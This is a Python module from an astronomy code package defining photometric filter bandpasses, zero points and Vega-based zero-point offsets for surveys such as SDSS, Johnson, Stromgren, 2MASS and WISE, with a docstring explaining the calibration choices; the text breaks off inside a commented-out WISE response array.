a44e66a82f876dda079686b32c767370276c38a1
|
[
"MIT"
] | 1
|
2020-07-13T19:39:15.000Z
|
2020-07-13T19:39:15.000Z
|
"""Filter bandpassses, zero points, and offsets.
Overview
--------
Bandpasses
^^^^^^^^^^
Many bandpasses are from Mann & von Braun (2015, MvB,
2015PASP..127..102M), which sought a self-consistent set of bandpasses
and zero points, mainly for "heritage" photometric systems that include
observations of bright stars. These filters are all in units of energy,
so are integrated directly (also commonly called relative system
response, or RSRs).
Synthetic photometry
^^^^^^^^^^^^^^^^^^^^
The Spitzer colour correction tests pass in comparison with those on the
SSC pages, with precision of a few percent or better (worst for IRAC),
so the correction to the fluxes is different by a few 10^-4 and good
enough. The differences appear to be in the details of the interpolation
and integration, but exactly where isn't clear (e.g. np.trapz and
scipy.integrate.simps give the same results). Anyway, the success of
these tests suggests that the synthetic photometry works.
Absolute calibration
^^^^^^^^^^^^^^^^^^^^
To ensure a consistent absolute calibration all zero points are re-
derived using the CALSPEC Vega spectrum, as this has been used by many
authors to derive zero point magnitudes (i.e. the magnitude of Vega in a
given photometric system, also known as the zero point offset). In
converting magnitudes to flux densities these offsets are subtracted, so
a positive offset yields a brighter flux for a given magnitude.
Optical
~~~~~~~
In the optical (shortward of 1 micron) the absolute calibration finds
Vega to be slightly fainter than zero magnitude. Systems still use Vega
for their zero point, but include an offset, which is the magnitude of
Vega in each filter, and is 0.027 in Johnson V.
The zero points are derived from the CALSPEC Vega spectrum, and offsets
have been derived by various authors e.g. Maiz-Appelaniz (2006), Bessell
& Murphy (2012), Mann & von Braun (2015).
In MvB there are no zero point offsets, so the zero points can be used
to derive ZPOs relative to the CALSPEC Vega spectrum. Their zero points
tend to be larger numbers, meaning that the ZPO (i.e. Vega) is a more
positive magnitude.
In most cases the zero point offsets have been re-derived with a
minimisation process that attempts to reach a happy medium across all
filters.
Infrared
~~~~~~~~
In the IR zero magnitude is defined by Vega, but again small offsets may
be needed. The CALSPEC spectrum appears to have the same IR flux as the
one in Cohen et al 1992 (i.e. gives same fluxes for 2MASS in Cohen et al
2003 and IRAS in Cohen et al 1992). The Vega spectrum in the 1992 paper
underpins most IR photometric systems (apart from the one proposed by
Rieke et al 2008, which is ~2% brighter). Thus, zero point offsets in
the IR shold be minimal. So while the K magnitude for Vega was found to
-0.36 by Rieke et al 2008, the K magnitude of "Vega" used for
calibration purposes is zero by definition.
Filters
-------
This file contains all the information specific to all bandpasses in a
dictionary called filters. Each entry has the name used by that bandpass
(e.g. UJ for Johnson U), and is itself a dictionary containing the
necessary subset of infomration for filter.Filter.get to construct that
filter.
Most of the information comes from the Spanish VO filter service at
http://svo2.cab.inta-csic.es/theory/fps3/, but is supplemented by extra
information to avoid various errors (e.g. mainly if a given bandpass is
in photon or energy units, but sometimes zero points and always zero
point offsets). The specific treatment of a given filter depends on
provenance and use.
An additional list of "dummy" filters is given, containing i) generic
bandpasses centered on a specific wavelength, and ii) colours/indices
that are combinations of other filters. These contain little actual
information aside from the name, which uses the convention of an
underscore to form a colour (e.g. "UJ_BJ" is Johnson U-B). Practically
this is done using the filter.Colour object, which contains a list of
filters and weights for a given colour/index that says how to add the
magnitudes.
These are roughly in order of wavelength.
.. todo:: all to be updated when ZPOs are sorted
GALEX
Filters are from SVO, and are effective area so can be considered
photon counting. Catalogue supplies fluxes and magnitudes, so for now
the former is used and no zero point needed. As-yet no evidence that
this system is or isn't consistent with "Vega". Magnitude system is
AB. Generally don't include in fitting due to the possibility of a UV
excess.
Johnson
Filters are from MvB. Photometry in this system comes from Mermilliod
(UBV means), Bessell (UBV, also Cousins RI), Koen (UBV).
Stromgren
Filters are from Bessell 2011 (MvB exist), used because conversions
from that paper are also used. Using these corrections didn't make any
obvious differences.
Vega has non-zero magnitudes in this system (e.g. Gray 1998), and
measurements in this system are only in colours/indices so the
absolute calibration is not important.
Hipparcos/Tycho
Filters are from MvB. Photometry in this system comes from the
original Hipparcos catalogue, and the Tycho 2 catalogue. Tycho-2 is
taken to have the "correct" absolute calibration in deriving others.
Gaia
Filters are from SVO.
Cousins
Filters are from MvB. Photometry in this system comes from Bessell.
Haven't been able to find which system most Gliese (CNS3) RI photmetry
is in, so not included.
Kepler
Filter from SVO. No photometry from this system used, so filter exists
to make predictions.
DDO
Filter from SVO, KPNO/Mosaic.D51 assumed to be similar to that used
for the survey of the Kepler field.
2MASS
Filters from Cohen (via SVO). Photometry from the 2MASS PSC, separated
into read1 (e.g. 2MR1H) and read2 (e.g. 2MR2H) after suggestion in
Rieke (2008) that there is a few percent offset for stars observed in
both modes. No evidence for this offset seen in SED fitting (yet).
This system is used as one of those with the "correct" absolute
calibration.
DENIS
Filters from Fouque et al 2000. Calibration assumes Vega is zero mag.
No zero point offsets.
Spitzer/IRAC
Filters from SSC (via SVO), need to be converted to energy. Photometry
is from SEIP. No zero point offsets used.
Spitzer/IRS PUI
Filters from SSC (via SVO), need to be converted to energy. No
photometry in this system currently used.
Spitzer/MIPS
Filters from SSC (via SVO), in photon units. Zero points derived from
"Vega", where "Vega" has been slightly rescaled (as returned by
spectrum.ObsSpectrum.vega() to ensure 7.17Jy as 23.675um. Assume
70 micron calibration used in published papers good enough (i.e.
photometric uncertainties much larger than calibration unceratinty).
WISE
Filters from SVO in energy units. Photometry from ALLWISE. Zero point
offset needed for W3.
AKARI/IRC
Filters from SVO in energy units. Photometry from IRC PSC. Catalogue
has fluxes so zero points not needed. Calibration uses Cohen network
so should have similar offsets to IRAC. Looks to be a systematic
change in S18/S09 as a function of S18 (or S09) for stars in narrow
B-V range, which could be the cause of apparent warm excesses arising
from only S18 photometry.
MSX
Filters from SVO as RSRs. No photometry in this system currently
included.
LBTI/NOMIC
Filter from Denis Defrere, assumed QE-based so needs to be converted
to photon units. No photometry, used for predictions.
IRAS
Filters from SVO in energy units. Photometry from PSC and FSC. At 12
micron Rieke conclude that the fluxes need to be reduced by a factor
of 0.992, and by 0.98 at 25 micron. Original calibration used.
Herschel/PACS
Filters from SVO in energy units. Use fluxes as published or in GMK's
personal catalogue, assume calibration uncertainty much smaller than
photometric uncertainty.
Herschel/SPIRE
Filters from SVO in energy units. Use fluxes as published or in GMK's
personal catalogue, assume calibration uncertainty much smaller than
photometric uncertainty.
"""
import os
import glob
import numpy as np
import astropy.units as u
from . import utils
c_micron = u.micron.to(u.Hz,equivalencies=u.spectral())
filters = {}
# dummy filters for colours/indices or artificial bandpasses
# that we want in the "all" list
extras = ['BS_YS','STROMM1','STROMC1',
'UJ_BJ','BJ_VJ','VJ_IC','VJ_RC','RC_IC',
'WAV44','WAV63',
'WAV350','WAV450','WAV610',
'WAV800','WAV850','WAV855',
'WAV860','WAV870','WAV880','WAV890','WAV895',
'WAV1100',
'WAV1200','WAV1240','WAV1250','WAV1260','WAV1270','WAV1290',
'WAV1300','WAV1310','WAV1330','WAV1340','WAV1350',
'WAV2000','WAV2140','WAV2700',
'WAV3000','WAV3190','WAV3300',
'WAV6800',
'WAV8800',
'WAV9000']
for f in extras:
filters[f] = {
'magnitude_system': None,
'zero_point': None,
'zero_point_ref': None,
'ref_wavelength': None,
'ref_spectrum': None,
'response_type': None,
'response_ref': None,
'wav_micron': None,
'response': None
}
# many filters can come from SVO, but photon/energy and probably zero
# points suspect, so do manually here
# http://svo2.cab.inta-csic.es/theory/fps3/
# GALEX responses are effective area, so equivalent
# to photon counting. Need to get these in AB system
filters['GALFUV'] = {'svo_name': 'PhotCalID=GALEX/GALEX.FUV/AB',
'response_type': 'photon'}
filters['GALNUV'] = {'svo_name': 'PhotCalID=GALEX/GALEX.NUV/AB',
'response_type': 'photon'}
# SDSS, zpos untested
filters['USDSS'] = {'svo_name': 'SLOAN/SDSS.u',
'magnitude_system': 'AB',
'zero_point_offset': 0.04,
'response_type': 'energy'}
filters['GSDSS'] = {'svo_name': 'SLOAN/SDSS.g',
'magnitude_system': 'AB',
'zero_point_offset': 0.01,
'response_type': 'energy'}
filters['RSDSS'] = {'svo_name': 'SLOAN/SDSS.r',
'magnitude_system': 'AB',
'zero_point_offset': 0.01,
'response_type': 'energy'}
filters['ISDSS'] = {'svo_name': 'SLOAN/SDSS.i',
'magnitude_system': 'AB',
'zero_point_offset': 0.01,
'response_type': 'energy'}
filters['ZSDSS'] = {'svo_name': 'SLOAN/SDSS.z',
'magnitude_system': 'AB',
'zero_point_offset': 0.0,
'response_type': 'energy'}
# APASS the same filters as SDSS, slight changes in zero point offsets
filters['GAPASS'] = {'svo_name': 'SLOAN/SDSS.g',
'magnitude_system': 'AB',
'zero_point_offset': 0.005,
'response_type': 'energy'}
filters['RAPASS'] = {'svo_name': 'SLOAN/SDSS.r',
'magnitude_system': 'AB',
'zero_point_offset': 0.005,
'response_type': 'energy'}
filters['IAPASS'] = {'svo_name': 'SLOAN/SDSS.i',
'magnitude_system': 'AB',
'zero_point_offset': -0.01,
'response_type': 'energy'}
# zero point offsets from Bessel & Murphy 2012 are 0.04, 0.022, 0.027.
# from MvB are 0.0188, 0.0185, 0.027 (latter fixed to 0.027)
# consider Johnson V magnitude of Vega to be immutable at 0.027
filters['UJ'] = {'svo_name': 'GCPD/Johnson.U',
'zero_point_offset': -0.04,
'response_type': 'energy'}
filters['BJ'] = {'svo_name': 'GCPD/Johnson.B',
'zero_point_offset': 0.058,
'response_type': 'energy'}
filters['VJ'] = {'svo_name': 'GCPD/Johnson.V',
'zero_point_offset': 0.027,
'response_type': 'energy'}
# APASS, uses Landolt standards
filters['BL'] = {'svo_name': 'GCPD/Johnson.B_Landolt',
'zero_point_offset': 0.008,
'response_type': 'energy'}
filters['VL'] = {'svo_name': 'GCPD/Johnson.V_Landolt',
'zero_point_offset': 0.017,
'response_type': 'energy'}
filters['BAPASS'] = filters['BL']
filters['VAPASS'] = filters['VL']
# zero point offsets from Bessel & Murphy 2012 are 0.027,0.028
# from MvB are 0.0212, 0.0091. Note that their R bandpasses look a bit
# different, so perhaps expect different ZPOs
filters['RC'] = {'svo_name': 'GCPD/Cousins.R',
'zero_point_offset': 0.047,
'response_type': 'energy'}
filters['IC'] = {'svo_name': 'GCPD/Cousins.I',
'zero_point_offset': 0.035,
'response_type': 'energy',
'zero_point': 2510.0} # wrong on SVO
# Stromgren (uvby) from Maiz-Appelaniz 2006 is 1.435, 0.182, 0.021,
# 0.014. Comparing Mann & von Braun and CALSPEC zero points gives 1.401,
# 0.175, 0.0256, 0.031. Gray 1998 gives 1.445, 0.195, 0.034, 0.03 and
# GCPD is almost exactly the same. Bessel gives coefficients to convert
# between observed and synthetic photometry, having assumed the GCPD
# zero points, which are a function of b-y, so needs to be implemented
# elsewhere (i.e. file read time)
filters['US'] = {#'svo_name': 'GCPD/Stromgren.u',
'magnitude_system': 'Vega',
'zero_point_offset': 1.435, #1.257,
'response_type': 'photon',
# Bessell 2011 responses, photon counting
'wav_micron': [0.3150, 0.3175, 0.3200, 0.3225, 0.3250,
0.3275, 0.3300, 0.3325, 0.3350, 0.3375, 0.3400, 0.3425, 0.3450, 0.3475,
0.3500, 0.3525, 0.3550, 0.3575, 0.3600, 0.3625, 0.3650, 0.3675, 0.3700,
0.3725, 0.3750, 0.3775, 0.3800, 0.3825, 0.3850],
'response': [0.000, 0.004, 0.050, 0.122, 0.219, 0.341,
0.479, 0.604, 0.710, 0.809, 0.886, 0.939, 0.976, 1.000, 0.995, 0.981,
0.943, 0.880, 0.782, 0.659, 0.525, 0.370, 0.246, 0.151, 0.071, 0.030,
0.014, 0.000, 0.000]
}
filters['VS'] = {#'svo_name': 'GCPD/Stromgren.v',
'magnitude_system': 'Vega',
'zero_point_offset': 0.182, #0.272,
'response_type': 'photon',
'wav_micron': [0.3750, 0.3775, 0.3800, 0.3825,
0.3850, 0.3875, 0.3900, 0.3925, 0.3950, 0.3975, 0.4000, 0.4025, 0.4050,
0.4075, 0.4100, 0.4125, 0.4150, 0.4175, 0.4200, 0.4225, 0.4250, 0.4275,
0.4300, 0.4325, 0.4350, 0.4375, 0.4400, 0.4425, 0.4450],
'response': [0.000, 0.003, 0.006, 0.016, 0.029, 0.044,
0.060, 0.096, 0.157, 0.262, 0.404, 0.605, 0.810, 0.958, 1.000, 0.973,
0.882, 0.755, 0.571, 0.366, 0.224, 0.134, 0.079, 0.053, 0.039, 0.027,
0.014, 0.006, 0.000]
}
filters['BS'] = {#'svo_name': 'GCPD/Stromgren.b',
'magnitude_system': 'Vega',
'zero_point_offset': 0.021, #0.055,
'response_type': 'photon',
'wav_micron': [0.4350, 0.4375, 0.4400, 0.4425, 0.4450,
0.4475, 0.4500, 0.4525, 0.4550, 0.4575, 0.4600, 0.4625, 0.4650, 0.4675,
0.4700, 0.4725, 0.4750, 0.4775, 0.4800, 0.4825, 0.4850, 0.4875, 0.4900,
0.4925, 0.4950, 0.4975, 0.5000, 0.5025, 0.5050],
'response': [0.000, 0.010, 0.023, 0.039, 0.056, 0.086,
0.118, 0.188, 0.287, 0.457, 0.681, 0.896, 0.998, 1.000, 0.942, 0.783,
0.558, 0.342, 0.211, 0.130, 0.072, 0.045, 0.027, 0.021, 0.015, 0.011,
0.007, 0.003, 0.000]
}
filters['YS'] = {#'svo_name': 'GCPD/Stromgren.y',
'magnitude_system': 'Vega',
'zero_point_offset': 0.014, #0.03,
'response_type': 'photon',
'wav_micron': [0.5150, 0.5175, 0.5200, 0.5225, 0.5250,
0.5275, 0.5300, 0.5325, 0.5350, 0.5375, 0.5400, 0.5425, 0.5450, 0.5475,
0.5500, 0.5525, 0.5550, 0.5575, 0.5600, 0.5625, 0.5650, 0.5675, 0.5700,
0.5725, 0.5750, 0.5775, 0.5800, 0.5825, 0.5850],
'response': [0.000, 0.022, 0.053, 0.082, 0.116, 0.194,
0.274, 0.393, 0.579, 0.782, 0.928, 0.985, 0.999, 1.000, 0.997, 0.938,
0.789, 0.574, 0.388, 0.232, 0.143, 0.090, 0.054, 0.031, 0.016, 0.010,
0.009, 0.004, 0.000]
}
# Skymapper
filters['SkyMapper.u'] = {'svo_name': 'SkyMapper/SkyMapper.u',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.v'] = {'svo_name': 'SkyMapper/SkyMapper.v',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.g'] = {'svo_name': 'SkyMapper/SkyMapper.g',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.r'] = {'svo_name': 'SkyMapper/SkyMapper.r',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.i'] = {'svo_name': 'SkyMapper/SkyMapper.i',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.z'] = {'svo_name': 'SkyMapper/SkyMapper.z',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
# zero point offsets from Bessel & Murphy 2012 (0.03,0.023,0.038)
# from MvB 0.0232, 0.0118, 0.0196
filters['BT'] = {'svo_name': 'TYCHO/TYCHO.B_MvB',
'zero_point_offset': 0.03,
'response_type': 'energy'}
filters['VT'] = {'svo_name': 'TYCHO/TYCHO.V_MvB',
'zero_point_offset': 0.023,
'response_type': 'energy'}
filters['HP'] = {'svo_name': 'Hipparcos/Hipparcos.Hp_MvB',
'zero_point_offset': 0.032,
'response_type': 'energy'}
# Gaia. Bandpasses appear to be photon counting according to Evans+2012,
# but are multiplied by lambda in SVO to convert to energy counting.
# equation 2. DR2 assumes Vega has flux 3.66e-9 at 550nm, but CALSPEC
# spectrum has 3.54e-9, so DR2 magnitudes ~3% too bright
filters['GAIA.G'] = {'svo_name': 'GAIA/GAIA2r.G',
'zero_point_offset': 0.0,
'response_type': 'energy'}
filters['GAIA.BP'] = {'svo_name': 'GAIA/GAIA2r.Gbp',
'zero_point_offset': 0.0,
'response_type': 'energy'}
filters['GAIA.RP'] = {'svo_name': 'GAIA/GAIA2r.Grp',
'zero_point_offset': 0.0,
'response_type': 'energy'}
# Kepler, assume photon and same zero point offset as V (0.027)
filters['KP'] = {'svo_name': 'Kepler/Kepler.K',
'zero_point_offset': 0.027,
'response_type': 'photon'}
filters['D51'] = {'svo_name': 'KPNO/Mosaic.D51',
'zero_point_offset': 0.027,
'response_type': 'photon'}
# 2MASS, assume no difference between R1/R2 until evidence otherwise,
# zero point offsets from Cohen+2003 (who assume Vega=0)
filters['2MJ'] = {'svo_name': '2MASS/2MASS.J',
'zero_point_offset': -0.001 - 0.03,
'response_type': 'energy'}
filters['2MH'] = {'svo_name': '2MASS/2MASS.H',
'zero_point_offset': 0.019 + 0.005,
'response_type': 'energy'}
filters['2MKS'] = {'svo_name': '2MASS/2MASS.Ks',
'zero_point_offset': -0.017 + 0.01,
'response_type': 'energy'}
filters['2MR1J'] = filters['2MJ']
filters['2MR1H'] = filters['2MH']
filters['2MR1KS'] = filters['2MKS']
filters['2MR2J'] = filters['2MJ']
filters['2MR2H'] = filters['2MH']
filters['2MR2KS'] = filters['2MKS']
# DENIS, assume energy counting
filters['IDENIS'] = {'svo_name': 'DENIS/DENIS.I',
'zero_point_offset': 0.0,
'response_type': 'energy'}
filters['JDENIS'] = {'svo_name': 'DENIS/DENIS.J',
'zero_point_offset': -0.02,
'response_type': 'energy'}
filters['KSDENIS'] = {'svo_name': 'DENIS/DENIS.Ks',
'zero_point_offset': -0.01,
'response_type': 'energy'}
# WISE, RSRs already converted to energy, ref spectrum
# is F_nu oc 1/nu^2. residuals from seds suggest small changes
# in zero point offsets, perhaps because "Vega" is fainter than Vega
# Patel+2014 find Ks-W1=0.031, and give saturated calibrations for W1/2
# empirically find W3 needs to go up a bit
# 3.3% shift in W4 bandpass recommended by 2014PASA...31...49B
def w1_cal_func(x):
"""Calibration fit for W1 from Patel+2014."""
if x < 8.0:
return -0.1359+0.0396*x-0.0023*x**2
else:
return 0.0
def w2_cal_func(x):
"""Calibration fit for W2 from Patel+2014."""
if x < 5.3:
return 1.5777 - 0.3495 * x + 0.016 * x**2
elif 5.3 <= x < 6.7:
return -0.353 + 0.8826 * x - 0.238 * x**2 + 0.017 * x**3
else:
return 0.0
filters['WISE3P4'] = {'svo_name': 'WISE/WISE.W1',
'response_type': 'energy',
'zero_point_offset': -0.015,
'measurement_calibration': lambda x: x + w1_cal_func(x),
'ref_wavelength': 3.3526,
'ref_spectrum': lambda nu: 1.0/nu/nu}
filters['WISE4P6'] = {'svo_name': 'WISE/WISE.W2',
'response_type': 'energy',
'zero_point_offset': 0.01,
'measurement_calibration': lambda x: x + w2_cal_func(x),
'ref_wavelength': 4.6028,
'ref_spectrum': lambda nu: 1.0/nu/nu}
filters['WISE12'] = {'svo_name': 'WISE/WISE.W3',
'response_type': 'energy',
'zero_point_offset': 0.03,
'ref_wavelength': 11.5608,
'ref_spectrum': lambda nu: 1.0/nu/nu}
filters['WISE22'] = {'svo_name': 'WISE/WISE.W4',
'response_type': 'energy',
'zero_point_offset': 0.0,
'ref_wavelength': 22.0883,
'ref_spectrum': lambda nu: 1.0/nu/nu}
# 'magnitude_system': 'Vega',
# 'wav_micron':[19.71997,19.7303,19.74063,19.75096,19.76129,19.77162,19.78195,19.79228,19.80261,19.81294,19.96789,19.97822,19.98855,19.99888,20.00921,20.01954,20.02987,20.0402,20.05053,20.06086,20.07119,20.08152,20.09185,20.10218,20.11251,20.12284,20.13317,20.1435,20.15383,20.16416,20.17449,20.18482,20.19515,20.20548,20.21581,20.22614,20.23647,20.2468,20.25713,20.26746,20.27779,20.28812,20.29845,20.30878,20.31911,20.32944,20.33977,20.3501,20.36043,20.37076,20.38109,20.39142,20.40175,20.41208,20.42241,20.43274,20.44307,20.4534,20.46373,20.47406,20.48439,20.49472,20.50505,20.51538,20.52571,20.53604,20.54637,20.5567,20.56703,20.57736,20.58769,20.59802,20.60835,20.61868,20.62901,20.63934,20.64967,20.66,20.67033,20.68066,20.69099,20.70132,20.71165,20.72198,20.73231,20.74264,20.75297,20.7633,20.77363,20.78396,20.79429,20.80462,20.81495,20.82528,20.83561,20.84594,20.85627,20.8666,20.87693,20.88726,20.89759,20.90792,20.91825,20.92858,20.93891,20.94924,20.95957,20.9699,20.98023,20.99056,21.00089,21.01122,21.02155,21.03188,21.04221,21.05254,21.06287,21.0732,21.08353,21.09386,21.10419,21.11452,21.12485,21.13518,21.14551,21.15584,21.16617,21.1765,21.18683,21.19716,21.20749,21.21782,21.22815,21.23848,21.24881,21.25914,21.26947,21.2798,21.29013,21.30046,21.31079,21.32112,21.33145,21.34178,21.35211,21.36244,21.37277,21.3831,21.39343,21.40376,21.41409,21.42442,21.43475,21.44508,21.45541,21.46574,21.47607,21.4864,21.49673,21.50706,21.51739,21.52772,21.53805,21.54838,21.55871,21.56904,21.57937,21.5897,21.60003,21.61036,21.62069,21.63102,21.64135,21.65168,21.66201,21.67234,21.68267,21.693,21.70333,21.71366,21.72399,21.73432,21.74465,21.75498,21.76531,21.77564,21.78597,21.7963,21.80663,21.81696,21.82729,21.83762,21.84795,21.85828,21.86861,21.87894,21.88927,21.8996,21.90993,21.92026,21.93059,21.94092,21.95125,21.96158,21.97191,21.98224,21.99257,22.0029,22.01323,22.02356,22.03389,22.04422,22.05455,22.06488,22.07521,22.08554,22.09587,22.1062,22.11653,22.12686,22.13719,22.14752,22.15785,22.16818,22.17851,22.18884,22.19917,22.2095,22.21983,22.23016,22.24049,22.25082,22.26115,22.27148,22.28181,22.29214,22.30247,22.3128,22.32313,22.33346,22.34379,22.35412,22.36445,22.37478,22.38511,22.39544,22.40577,22.4161,22.42643,22.43676,22.44709,22.45742,22.46775,22.47808,22.48841,22.49874,22.50907,22.5194,22.52973,22.54006,22.55039,22.56072,22.57105,22.58138,22.59171,22.60204,22.61237,22.6227,22.63303,22.64336,22.65369,22.66402,22.67435,22.68468,22.69501,22.70534,22.71567,22.726,22.73633,22.74666,22.75699,22.76732,22.77765,22.78798,22.79831,22.80864,22.81897,22.8293,22.83963,22.84996,22.86029,22.87062,22.88095,22.89128,22.90161,22.91194,22.92227,22.9326,22.94293,22.95326,22.96359,22.97392,22.98425,22.99458,23.00491,23.01524,23.02557,23.0359,23.04623,23.05656,23.06689,23.07722,23.08755,23.09788,23.10821,23.11854,23.12887,23.1392,23.14953,23.15986,23.17019,23.18052,23.19085,23.20118,23.21151,23.22184,23.23217,23.2425,23.25283,23.26316,23.27349,23.28382,23.29415,23.30448,23.31481,23.32514,23.33547,23.3458,23.35613,23.36646,23.37679,23.38712,23.39745,23.40778,23.41811,23.42844,23.43877,23.4491,23.45943,23.46976,23.48009,23.49042,23.50075,23.51108,23.52141,23.53174,23.54207,23.5524,23.56273,23.57306,23.58339,23.59372,23.60405,23.61438,23.62471,23.63504,23.64537,23.6557,23.66603,23.67636,23.68669,23.69702,23.70735,23.71768,23.72801,23.73834,23.74867,23.759,23.76933,23.77966,23.78999,23.80032,23.81065,23.82098,23.83131,23.84164,23.85197,23.8623,23.87263,23.88296,23.89329,23.90362,23.91395,23.92428,23.93461,23.94494,23.95527,23.9656,23.97593,23.98626,23.99659,24.00692,24.01725,24.02758,24.03791,24.04824,24.05857,24.0689,24.07923,24.08956,24.09989,24.11022,24.12055,24.13088,24.14121,24.15154,24.16187,24.1722,24.18253,24.19286,24.20319,24.21352,24.22385,24.23418,24.24451,24.25484,24.26517,24.2755,24.28583,24.29616,24.30649,24.31682,24.32715,24.33748,24.34781,24.35814,24.36847,24.3788,24.38913,24.39946,24.40979,24.42012,24.43045,24.44078,24.45111,24.46144,24.47177,24.4821,24.49243,24.50276,24.51309,24.52342,24.53375,24.54408,24.55441,24.56474,24.57507,24.5854,24.59573,24.60606,24.61639,24.62672,24.63705,24.64738,24.65771,24.66804,24.67837,24.6887,24.69903,24.70936,24.71969,24.73002,24.74035,24.75068,24.76101,24.77134,24.78167,24.792,24.80233,24.81266,24.82299,24.83332,24.84365,24.85398,24.86431,24.87464,24.88497,24.8953,24.90563,24.91596,24.92629,24.93662,24.94695,24.95728,24.96761,24.97794,24.98827,24.9986,25.00893,25.01926,25.02959,25.03992,25.05025,25.06058,25.07091,25.08124,25.09157,25.1019,25.11223,25.12256,25.13289,25.14322,25.15355,25.16388,25.17421,25.18454,25.19487,25.2052,25.21553,25.22586,25.23619,25.24652,25.25685,25.26718,25.27751,25.28784,25.29817,25.3085,25.31883,25.32916,25.33949,25.34982,25.36015,25.37048,25.38081,25.39114,25.40147,25.4118,25.42213,25.43246,25.44279,25.45312,25.46345,25.47378,25.48411,25.49444,25.50477,25.5151,25.52543,25.53576,25.54609,25.55642,25.56675,25.57708,25.58741,25.59774,25.60807,25.6184,25.62873,25.63906,25.64939,25.65972,25.67005,25.68038,25.69071,25.70104,25.71137,25.7217,25.73203,25.74236,25.75269,25.76302,25.77335,25.78368,25.79401,25.80434,25.81467,25.825,25.83533,25.84566,25.85599,25.86632,25.87665,25.88698,25.89731,25.90764,25.91797,25.9283,25.93863,25.94896,25.95929,25.96962,25.97995,25.99028,26.00061,26.01094,26.02127,26.0316,26.04193,26.05226,26.06259,26.07292,26.08325,26.09358,26.10391,26.11424,26.12457,26.1349,26.14523,26.15556,26.16589,26.17622,26.18655,26.19688,26.20721,26.21754,26.22787,26.2382,26.24853,26.25886,26.26919,26.27952,26.28985,26.30018,26.31051,26.32084,26.33117,26.3415,26.35183,26.36216,26.37249,26.38282,26.39315,26.40348,26.41381,26.42414,26.43447,26.4448,26.45513,26.46546,26.47579,26.48612,26.49645,26.50678,26.51711,26.52744,26.53777,26.5481,26.55843,26.56876,26.57909,26.58942,26.59975,26.61008,26.62041,26.63074,26.64107,26.6514,26.66173,26.67206,26.68239,26.69272,26.70305,26.71338,26.72371,26.73404,26.74437,26.7547,26.76503,26.77536,26.78569,26.79602,26.80635,26.81668,26.82701,26.83734,26.84767,26.858,26.86833,26.87866,26.88899,26.89932,26.90965,26.91998,26.93031,26.94064,26.95097,26.9613,26.97163,26.98196,26.99229,27.00262,27.01295,27.02328,27.03361,27.04394,27.05427,27.0646,27.07493,27.08526,27.09559,27.10592,27.11625,27.12658,27.13691,27.14724,27.15757,27.1679,27.17823,27.18856,27.19889,27.20922,27.21955,27.22988,27.24021,27.25054,27.26087,27.2712,27.28153,27.29186,27.30219,27.31252,27.32285,27.33318,27.34351,27.35384,27.36417,27.3745,27.38483,27.39516,27.40549,27.41582,27.42615,27.43648,27.44681,27.45714,27.46747,27.4778,27.48813,27.49846,27.50879,27.51912,27.52945,27.53978,27.55011,27.56044,27.57077,27.5811,27.59143,27.60176,27.61209,27.62242,27.63275,27.64308,27.65341,27.66374,27.67407,27.6844,27.69473,27.70506,27.71539,27.72572,27.73605,27.74638,27.75671,27.76704,27.77737,27.7877,27.79803,27.80836,27.81869,27.82902,27.83935,27.84968,27.86001,27.87034,27.88067,27.891,27.90133,27.91166,27.92199,27.93232,27.94265,27.95298,27.96331,27.97364,27.98397,27.9943,28.00463,28.01496,28.02529,28.03562,28.04595,28.05628,28.06661,28.07694,28.08727,28.0976,28.10793,28.11826,28.12859,28.13892,28.14925,28.15958,28.16991,28.18024,28.19057,28.2009,28.21123,28.22156,28.23189,28.24222,28.25255,28.26288,28.67608,28.68641,28.69674,28.70707,28.7174,28.72773,28.73806,28.74839,28.75872,28.76905,28.77938,28.78971,28.80004,28.81037,28.8207,28.83103,28.84136,28.85169,28.86202,28.87235,28.88268,28.89301,28.90334],
# 'response':[0.00167933,0.00231167,0.00280867,0.00295900,0.00301867,0.00289700,0.00271100,0.00239167,0.00196367,0.00144667,0.00102167,0.00116533,0.00135667,0.00155100,0.00196267,0.00243967,0.00327200,0.00426667,0.00528333,0.00621000,0.00698333,0.00754333,0.00805000,0.00841333,0.00877000,0.00904667,0.00932000,0.00972000,0.0102100,0.0109567,0.0119633,0.0132333,0.0149433,0.0168667,0.0195633,0.0224100,0.0262700,0.0303333,0.0354667,0.0407667,0.0467333,0.0533667,0.0610000,0.0693000,0.0782667,0.0885667,0.0995333,0.113133,0.127067,0.143933,0.161500,0.182000,0.202800,0.225933,0.250433,0.276567,0.305033,0.334333,0.371000,0.407333,0.447333,0.487000,0.527000,0.567000,0.600333,0.633667,0.664000,0.691000,0.714667,0.738333,0.758333,0.778667,0.795333,0.809000,0.815667,0.822667,0.822667,0.823000,0.819667,0.819667,0.820000,0.820000,0.823333,0.827000,0.830333,0.833667,0.837000,0.837000,0.837333,0.840667,0.847333,0.857333,0.867333,0.880667,0.890667,0.900333,0.907000,0.907000,0.910333,0.907000,0.907000,0.903667,0.900333,0.897333,0.897333,0.890667,0.884000,0.877333,0.870667,0.864000,0.860667,0.860667,0.860667,0.867000,0.873667,0.883667,0.890333,0.897000,0.900333,0.903667,0.907000,0.910333,0.917000,0.923667,0.933667,0.940333,0.950333,0.950333,0.953667,0.950333,0.947000,0.940333,0.937000,0.933667,0.930333,0.930333,0.930333,0.927000,0.923667,0.920333,0.913667,0.910333,0.903667,0.903667,0.907000,0.913667,0.923667,0.930333,0.937000,0.940333,0.940333,0.937000,0.930333,0.923667,0.917000,0.910333,0.910333,0.910333,0.913667,0.913667,0.917000,0.920333,0.920333,0.917000,0.917000,0.917000,0.917000,0.920333,0.920333,0.923667,0.923667,0.923667,0.917000,0.910333,0.903667,0.893667,0.883667,0.880333,0.873667,0.877000,0.877000,0.883667,0.890333,0.893667,0.900333,0.907000,0.910333,0.917000,0.923667,0.930333,0.940333,0.950333,0.960000,0.970000,0.976667,0.983333,0.983333,0.983333,0.983333,0.983333,0.986667,0.986667,0.990000,0.996667,1.00000,1.00000,1.00000,0.993333,0.986667,0.976667,0.963333,0.956667,0.946667,0.940000,0.936667,0.933333,0.930000,0.926667,0.923333,0.920000,0.913333,0.910000,0.906667,0.906667,0